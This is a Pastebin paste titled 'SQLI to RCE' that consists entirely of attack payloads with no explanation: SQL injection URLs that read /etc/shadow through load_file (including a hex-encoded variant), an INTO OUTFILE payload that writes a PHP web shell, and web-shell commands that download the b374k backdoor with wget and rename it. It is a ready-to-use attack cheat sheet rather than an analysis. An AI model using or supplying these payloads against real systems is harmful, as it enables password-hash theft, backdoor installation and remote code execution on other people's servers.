Advertisement
paperline27

奖金!!!,SQLI 到 RCE

Jan 22nd, 2024 (edited)
225
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.63 KB | Cybersecurity | 0 0
  1. [ LOAD FILE ]
  2. http://localhost:1337/vuln.php?id=-1 union select 1,load_file(/etc/shadow),3--+-
  3.  
  4. http://localhost:1337/vuln.php?id=-1 union select 1,load_file(0x2f6574632f736861646f77),3--+-
  5.  
  6. [ INTO OUTFILE ]
  7. http://localhost:1337/vuln.php?id=-1 union select 1,”<?php var_dump($_GET[‘a’]($_GET[‘b’])); ?>“,3  into outfile “/folder1/folder2/rce.php” --+-
  8.  
  9. http://localhost:1337/rce.php?cmd=wget https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/b374k.php -o backdoor.php5.txt
  10.  
  11. http://localhost:1337/rce.php?cmd=mv backdoor.php5.txt backdoor.pl.rb.ApapunBahasanya.asm.c
  12.  
  13.  
  14.  
  15.  
  16.  
  17.  
  18.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement